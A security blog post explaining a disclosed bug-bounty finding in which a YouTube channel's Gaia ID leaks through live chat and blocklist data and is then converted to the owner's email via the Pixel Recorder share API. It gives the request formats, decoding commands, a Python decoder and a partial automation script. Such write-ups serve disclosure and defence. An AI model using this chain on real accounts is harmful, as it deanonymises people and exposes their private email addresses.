Greetings, readers of HackingBlogs! In this piece, we examine an unusual security flaw found by the researcher Brutecat that could let an attacker obtain the email address behind any YouTube channel. Google paid Brutecat a $10,000 reward for the report. The flaw sounds alarming, so we walk through it step by step: how it was discovered, how the pieces chain together, and what the fix looks like.
The Initial Discovery: Leaking Google Account IDs on YouTube
The problem started when Brutecat was reviewing the discovery document for Google's internal People API (staging). While sorting through it, Brutecat noticed something odd: the block-user functionality was working with obfuscated Gaia IDs, the internal identifiers Google uses for accounts. Blocking someone on YouTube is keyed on a Gaia ID, and the issue was that this identifier was being exposed where it should not have been.
When a user blocks someone on YouTube, the blocked channel's obfuscated Gaia ID is added to the blocker's blocklist, which is visible in the blocker's own Google account settings. So anyone who can read their blocklist can learn the Gaia ID of a channel they blocked, and with it a handle on the Google account behind that YouTube channel.
Escalating the Issue: Can We Leak Gaia IDs from All YouTube Channels?
At first the leak appeared limited to users one had blocked, but Brutecat suspected it could be escalated. The next logical question was whether the Gaia ID of any YouTube channel could be exposed, not just blocked ones. The answer turned out to be yes.
After some digging, Brutecat found that interacting with the live chat context menu sends a request to the backend whose params value is base64-encoded protobuf data. Decoding that data revealed the Gaia ID of the live chat user, so the ID could be obtained without blocking anyone.
Here is an example of the POST request sent when YouTube's context menu is opened:
POST /youtubei/v1/live_chat/get_item_context_menu?params=<encoded-data> HTTP/2
Host: www.youtube.com
Cookie: <redacted>
Decoding the Request Params: How Gaia IDs Are Leaked
Standard tools are enough to decode the request data sent during the context menu interaction: base64 for the two layers of encoding and protoc for the protobuf payload. Brutecat decoded the request parameters as follows (the outer base64 layer wraps a URL-escaped base64 string, which is why the = padding shows up as %3D and has to be restored before the second decode):
$ echo -n "<encoded-string>" | base64 -d | sed 's/%3D/=/g' | base64 -d | protoc --decode_raw
The decoded data contains the targeted user's Gaia ID:
{
  "user": {
    "gaia_id": "113907466537670370590"
  }
}
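The shell pipeline above depends on protoc being installed and on the %3D substitution being the only escaping present. The following Python script, added here as an illustration and not part of Brutecat's tooling or the original article, reproduces the same decoding end to end: outer base64, URL-unescape, inner base64, then a schema-less protobuf wire-format decode in the style of protoc --decode_raw. It goes slightly beyond the page by accepting URL-safe base64 and any percent-escape, and it walks the decoded tree for the Gaia ID. The sample input is constructed inline; the protobuf field numbers 3 (outer) and 1 (inner) used to build it are assumptions, since the page does not show the real schema.

```python
import base64
import urllib.parse

# Added example, not Brutecat's tooling: a schema-less protobuf wire-format
# decoder mirroring `base64 -d | sed 's/%3D/=/g' | base64 -d | protoc --decode_raw`.

GAIA_ID = "113907466537670370590"  # the value shown in the article's decoded output


def _b64decode(s: str) -> bytes:
    # Accept standard and URL-safe alphabets and repair stripped padding;
    # YouTube `params` values are frequently URL-safe base64 without padding.
    return base64.b64decode(s + "=" * (-len(s) % 4), altchars=b"-_")


def read_varint(buf: bytes, pos: int):
    """Read one base-128 varint starting at pos; return (value, new_pos)."""
    result, shift = 0, 0
    while True:
        b = buf[pos]  # IndexError on truncated input aborts the attempt
        pos += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, pos
        shift += 7


def decode_raw(buf: bytes) -> dict:
    """Decode protobuf wire format without a schema, like protoc --decode_raw.
    Returns {field_number: [value, ...]}; nested messages become dicts."""
    fields, pos = {}, 0
    while pos < len(buf):
        key, pos = read_varint(buf, pos)
        field, wire_type = key >> 3, key & 7
        if wire_type == 0:  # varint
            value, pos = read_varint(buf, pos)
        elif wire_type == 2:  # length-delimited: string, bytes or nested message
            length, pos = read_varint(buf, pos)
            if pos + length > len(buf):
                raise ValueError("length-delimited field runs past buffer")
            value = _guess(buf[pos:pos + length])
            pos += length
        elif wire_type in (1, 5):  # fixed64 / fixed32
            width = 8 if wire_type == 1 else 4
            if pos + width > len(buf):
                raise ValueError("fixed-width field runs past buffer")
            value = int.from_bytes(buf[pos:pos + width], "little")
            pos += width
        else:
            raise ValueError(f"unsupported wire type {wire_type}")
        fields.setdefault(field, []).append(value)
    return fields


def _guess(raw: bytes):
    """Heuristic for length-delimited payloads: printable UTF-8 is returned as str,
    otherwise try to parse a nested message, otherwise keep the raw bytes."""
    try:
        text = raw.decode("utf-8")
        if text.isprintable():
            return text
    except UnicodeDecodeError:
        pass
    try:
        nested = decode_raw(raw)
        if nested:
            return nested
    except (IndexError, ValueError):
        pass
    return raw


def decode_params(params: str) -> dict:
    """The article's shell pipeline in Python: outer base64, URL-unescape (covers
    %3D and any other escape), inner base64, then raw protobuf decode."""
    url_escaped = _b64decode(params).decode("ascii")
    inner_b64 = urllib.parse.unquote(url_escaped)
    return decode_raw(_b64decode(inner_b64))


def find_gaia_id(fields: dict):
    """Depth-first search for the first all-digit string of Gaia ID length (~21 digits)."""
    for values in fields.values():
        for v in values:
            if isinstance(v, dict):
                found = find_gaia_id(v)
                if found:
                    return found
            elif isinstance(v, str) and v.isdigit() and len(v) >= 20:
                return v
    return None


# --- constructed sample input (not a captured YouTube request) -------------
def _varint(n: int) -> bytes:
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        out.append(b | 0x80 if n else b)
        if not n:
            return bytes(out)


def _length_delimited(field: int, payload: bytes) -> bytes:
    return _varint((field << 3) | 2) + _varint(len(payload)) + payload


def build_sample_params(gaia_id: str = GAIA_ID) -> str:
    """Nested message carrying gaia_id, double base64-encoded with '=' escaped as
    %3D as in the article. Field numbers 3 (outer) and 1 (inner) are assumptions."""
    inner = _length_delimited(1, gaia_id.encode())
    outer = _length_delimited(3, inner)
    inner_b64 = base64.b64encode(outer).decode()
    return base64.b64encode(inner_b64.replace("=", "%3D").encode()).decode()


if __name__ == "__main__":
    tree = decode_params(build_sample_params())
    print(tree)
    print("gaia_id:", find_gaia_id(tree))
```

To use it on a real capture, pass the params value from the request URL to decode_params and inspect the returned tree; the string-versus-message heuristic in _guess is deliberately simple, so a length-delimited field that is both printable and a valid message will be shown as text.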
Brutecat had to figure out how to turn the Gaia ID into a legitimate email address after obtaining it.
The Final Step: Converting a Gaia ID to an Email Address
The key finding was that Google's Pixel Recorder service offered a way to perform this conversion. When a user shares a recording from Pixel Recorder, the service sends an email to the recipient and its API echoes back the actual address linked to the recipient's Google account.
By sharing a recording with the obfuscated Gaia ID as the recipient, Brutecat got the Pixel Recorder API to return the email address associated with that Google account.
This is an illustration of how to share a recording using a POST request:
POST /$rpc/java.com.google.wireless.android.pixel.recorder.protos.PlaybackService/WriteShareList HTTP/2
Host: pixelrecorder-pa.clients6.google.com
Content-Type: application/json+protobuf
Authorization: <auth-token>
As part of the sharing procedure, the request carries the Gaia ID, and the response contains the account's email address. Example response:
[
  "28bc3792-9bdb-4aed-9a78-17b0954abc7d",
  [
    [null, 2, "vrptest2@gmail.com"]
  ]
]
Code Example: How to Retrieve the Email
Brutecat automated the chain with a Python script. The fragment reproduced below covers the first step, resolving a share ID to the recording's metadata via GetRecordingInfo; the WriteShareList call that carries the Gaia ID and returns the email is made against the same base URL with the same headers:
import json
import requests

BASE_URL = "https://pixelrecorder-pa.clients6.google.com/$rpc/java.com.google.wireless.android.pixel.recorder.protos.PlaybackService/"
headers = {
    "Host": "pixelrecorder-pa.clients6.google.com",
    "Content-Type": "application/json+protobuf",
    "Authorization": "<auth-token>",  # OAuth bearer token for the attacker's own account
}

def get_recording_uuid(share_id: str):
    # json+protobuf bodies are positional JSON arrays; json.dumps escapes the value safely
    payload = json.dumps([share_id])
    response = requests.post(BASE_URL + "GetRecordingInfo", headers=headers, data=payload)
    response.raise_for_status()
    return response.json()

def main():
    share_id = input("Enter share ID: ")
    uuid = get_recording_uuid(share_id)
    print("UUID:", uuid)

if __name__ == "__main__":
    main()
Running this against a share ID returns the recording's metadata; the follow-up WriteShareList request with the obfuscated Gaia ID as the recipient returned the email address, as in the response shown above.
The flaw needs fixing on both ends of the chain. On the YouTube side, obfuscated Gaia IDs should not be exposed through user-reachable endpoints such as the blocklist and the live chat context menu params. On the conversion side, services like Pixel Recorder must not translate a Gaia ID into an email address for a caller who has no existing relationship with that account.
More generally, any backend service that accepts a Gaia ID and returns account data is a candidate for the same email leak and should be audited, so that Gaia IDs cannot be turned into identities through these APIs.